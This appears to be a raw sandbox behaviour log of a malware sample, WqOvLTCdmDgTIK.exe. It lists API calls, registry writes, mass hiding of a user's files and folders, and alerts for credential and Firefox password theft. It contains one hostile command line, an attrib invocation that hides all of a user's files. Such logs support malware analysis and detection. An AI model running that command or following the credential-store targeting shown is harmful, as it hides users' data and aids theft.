  API Name:  GetSystemDirectoryA   Address:  0x74723c1f
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
Regkey
Setval
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Start Men
   u" = C:\Documents and Settings\All Users\Start Menu
1436
Regkey
Setval
\REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
   n\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
1436
Process
Started
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  attrib +h "C:\Documents and Settings\admin\*.*" /s /d
16321436
Malicious  Alert
Misc  Anomaly
Message:   External file attribute modification    Detail:   Malware modifying file attributes via an external process   
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Mutex
  Imagepath:  C:\WINDOWS\system32\attrib.exe
1632
Mutex
\BaseNamedObjects\MSCTF.Shared.MUTEX.ABF
1436
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\AutoFillDefaults.dat
1632
Malicious  Alert
Misc  Anomaly
Message:   File/folder hiding    Detail:   Malware hiding file/folder   
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences\defaultHeuristics.dat
1632870
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer\metadata\Synchronize
   r80
163221504
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer\adobesynchronizersu8
   0
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer\metadata
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\AdobeCMapFnt08.lst
1632508
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\AdobeSysFnt08.lst
163223094
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Collab
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Preferences
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\Synchronizer
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0\UserCache.bin
163216606
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat\8.0
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Diction
   ary\all
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Diction
   ary\brt
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Diction
   ary\can
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Diction
   ary\eng
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Diction
   ary
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics\Dictionaries
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Acrobat
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe\Linguistics
1632
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Identities\{3D364D28-DDA0-4EA8-B8A3-09FA4E4F1754}
1632
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials
1632
Malicious  Alert
Data  Theft
Message:   Cached credentials theft    Detail:   Malware stealing credentials for remote network shares   
Folder
Open
C:\Documents and Settings\admin\Application Data\Microsoft\Credentials\S-1-5-21-1409082233-688789844
   -725345543-1003
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Excel\XLSTART
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help\hh.dat
16328590
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.bak
1632141
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\brndlog.txt
163210381
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer\Quick Launch
1632
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\EnergyCrisis.LNK
1632536
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\HomeWork.LNK
1632401
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\ParaPsychology.LNK
1632546
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\Templates.LNK
1632766
File
Hide

Target:      C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent\Worksheet.LNK
1632521
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\Excel11.pip
16321544
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\MSO1033.acl
163237814
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\MSOut11.pip
16321696
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\PowerP11.pip
16321476
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\Recent
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office\Word11.pip
16321684
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\Outlook.srs
16322560
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Outlook\Outlook.xml
16322052
File
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Templates\Normal.dot
163232256
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Word\STARTUP
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\AddIns
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Excel
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\HTML Help
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Internet Explorer
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Media Player
1632
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\MMC
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Office
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Outlook
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Proof
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Templates
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Microsoft\Word
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e
   97384}
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports\InstallTime2010101211
   3537
163210
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\bookmarkb
   ackups\bookmarks-2012-01-26.json
16324131
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\chrome\us
   erChrome-example.css
1632959
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\chrome\us
   erContent-example.css
1632663
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\bookmarkb
   ackups
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\bookmarks
   .html
16326284
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cert8.db
163265536
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\chrome
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\compatibi
   lity.ini
1632188
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\compreg.d
   at
1632147965
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\content-p
   refs.sqlite
16327168
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cookies.s
   qlite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\cookies.s
   qlite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\downloads
   .sqlite
16322048
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.cache
1632425
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.ini
1632277
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.log
1632430
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\extension
   s.rdf
16323357
File
Open
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\formhisto
   ry.sqlite
16324096
Malicious  Alert
Data  Theft
Message:   Firefox auto-complete password theft    Detail:   Malware stealing auto-complete password   
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\formhisto
   ry.sqlite
16324096
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\key3.db
163216384
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\localstor
   e.rdf
16321454
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\mimeTypes
   .rdf
16326211
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\minidumps
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\permissio
   ns.sqlite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\places.sq
   lite
1632135168
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\places.sq
   lite-journal
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\pluginreg
   .dat
  MD5:  e2f29b9a9f0c02b8686ce4228f1a99ee
  SHA1: 7e48e7800d6ee451c476169667fc3a83101bfcd6
16329062
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\prefs.js
  MD5:  df60af0a8c7581ced90a1fbbc60c2434
  SHA1: 2e5a2d4581fd74b51f7d800cb9ee64442d58c133
16323232
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\prefs.js.
   bak
16323231
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\search.js
   on
163211719
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\search.sq
   lite
16322048
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\secmod.db
163216384
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default\xpti.dat
1632102494
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\j4b44wap.default
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Crash Reports
1632
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\profiles.ini
1632111
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Extensions
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla\Firefox
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\CDBurning.log
16322
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\GenDevices.log
1632465
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\pdgenctnomad.log
1632456
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs\pdgenwmdm.log
1632449
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\browserrecord.swf
  MD5:  5d76f9e475bc29044acb3653d8a1b339
  SHA1: 18e5b37a7da3d13af1070d75d30ef1cd7ea05715
1632994
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\browserrecordupdate.dat
1632459
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\browserrecordupdateloc.dat
1632532
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\ErrorLogs
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer\RealPlayer-log.txt
163280910
File
Hide
C:\Documents and Settings\admin\Application Data\Real\rnadmin\rnsystem.dat
16321161
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\Msg
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\RealPlayer
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real\rnadmin
1632
File
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment\deployment.properties
1632909
File
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\Data1.cab
163213005452
File
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\jre1.6.0_16.msi
16321757696
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\Deployment
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun\Java
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Adobe
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Identities
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Mozilla
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Real
1632
Folder
Hide
C:\Documents and Settings\admin\Application Data\Sun
1632
Folder
Open
C:\Documents and Settings\admin\Cookies
1632
File
Open
C:\Documents and Settings\admin\Cookies\admin@ad.wsod[2].txt
1632176
File
Hide
C:\Documents and Settings\admin\Cookies\admin@ad.wsod[2].txt
1632176
File
Open
C:\Documents and Settings\admin\Cookies\admin@atdmt[2].txt
1632180
File
Hide
C:\Documents and Settings\admin\Cookies\admin@atdmt[2].txt
1632180
File
Open
C:\Documents and Settings\admin\Cookies\admin@bing[2].txt
1632192
File
Hide
C:\Documents and Settings\admin\Cookies\admin@bing[2].txt
1632192
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.atdmt[2].txt
1632198
File
Hide
C:\Documents and Settings\admin\Cookies\admin@c.atdmt[2].txt
1632198
File
Open
C:\Documents and Settings\admin\Cookies\admin@c.msn[1].txt
163267
File
Hide
C:\Documents and Settings\admin\Cookies\admin@c.msn[1].txt
163267
File
Open
C:\Documents and Settings\admin\Cookies\admin@match[2].txt
1632174
File
Hide
C:\Documents and Settings\admin\Cookies\admin@match[2].txt
1632174
File
Open
C:\Documents and Settings\admin\Cookies\admin@microsoft[1].txt
1632108
File
Hide
C:\Documents and Settings\admin\Cookies\admin@microsoft[1].txt
1632108
File
Open
C:\Documents and Settings\admin\Cookies\admin@msn[1].txt
1632584
File
Hide
C:\Documents and Settings\admin\Cookies\admin@msn[1].txt
1632584
File
Open
C:\Documents and Settings\admin\Cookies\admin@scorecardresearch[2].txt
1632195
File
Hide
C:\Documents and Settings\admin\Cookies\admin@scorecardresearch[2].txt
1632195
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.bing[1].txt
1632111
File
Hide
C:\Documents and Settings\admin\Cookies\admin@www.bing[1].txt
1632111
File
Open
C:\Documents and Settings\admin\Cookies\admin@www.msn[2].txt
1632230
File
Hide
C:\Documents and Settings\admin\Cookies\admin@www.msn[2].txt
1632230
File
Open
C:\Documents and Settings\admin\Cookies\index.dat
163232768
File
Hide
C:\Documents and Settings\admin\Cookies\index.dat
163232768
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Customize Links.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Free Hotmail.url
1632113
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Windows Marketplace.url
1632169
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Windows Media.url
1632118
File
Hide
C:\Documents and Settings\admin\Favorites\Links\Windows.url
1632113
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\IE Add-on site.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Marketplace.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Microsoft At Home.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Microsoft At Work.url
1632133
File
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites\Welcome to IE7.url
1632133
Folder
Hide
C:\Documents and Settings\admin\Favorites\Links
1632
Folder
Hide
C:\Documents and Settings\admin\Favorites\Microsoft Websites
1632
File
Hide
C:\Documents and Settings\admin\Favorites\MSN.com.url
1632119
File
Hide
C:\Documents and Settings\admin\Favorites\Radio Station Guide.url
1632197
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache\AcroFnt08.ls
   t
16327980
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Updater\updater.lo
   g
16321756
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Cache
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0\Updater
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat\8.0
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color\ACECache6.lst
16324377
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Acrobat
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe\Color
1632
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials
1632
Folder
Open
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-14090
   82233-688789844-725345543-1003
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\Microsoft Feeds~\Mic
   rosoft at Home~.feed-ms
163228672
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\Microsoft Feeds~\Mic
   rosoft at Work~.feed-ms
163228672
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\FeedsStore.feedsdb-m
   s
16325120
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds\Microsoft Feeds~
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds Cache\GZTM07S1\fwlin
   k[1]
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds Cache\LQ0B1692\fwlin
   k[1]
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\FORMS\FRMCACHE.DAT
1632175500
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Internet Explorer\brndlog.
   txt
16328660
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ
   .DAT
163216384
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Media Player\CurrentDataba
   se_59R.wmdb
1632720896
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Outlook\extend.dat
1632519
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Outlook\Outlook.pst
1632271360
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\10.0\WMSDKNS
   .DTD
1632498
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\10.0\WMSDKNS
   .XML
163212784
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.
   DTD
1632498
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.
   XML
163212784
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\10.0
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media\9.0
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\CD Burning
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Feeds
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\FORMS
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Internet Explorer
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Media Player
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\OFFICE
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Outlook
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Silverlight
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft\Windows Media
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_001_
16324096
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_002_
16324096
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_003_
16324096
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache\_CACHE_MAP_
16328468
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\Cache
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\urlclassifier3.sqlite
163232768
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\XPC.mfl
  MD5:  3cb074bd9bec5869d44fd5cbae2baec1
  SHA1: 66344ee8349519b6a3145471ffa78bfee3553f78
16324015580
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault\XUL.mfl
16321047114
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles\j4b44wap.de
   fault
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox\Profiles
1632
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla\Firefox
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Adobe
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF
   .ini
16323584
File
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
163213104
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Microsoft
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Application Data\Mozilla
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat
163232768
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\OHotfix\OHotfix(00001).log
16323865
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\OHotfix\OHotfix(00001)_Msi.log
16325944646
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\outlook logging\firstrun.log
1632699
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Accessibility\Acces
   sibility Wizard.lnk
16321520
API Call
  API Name:  Sleep   Address:  0x004027fc
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
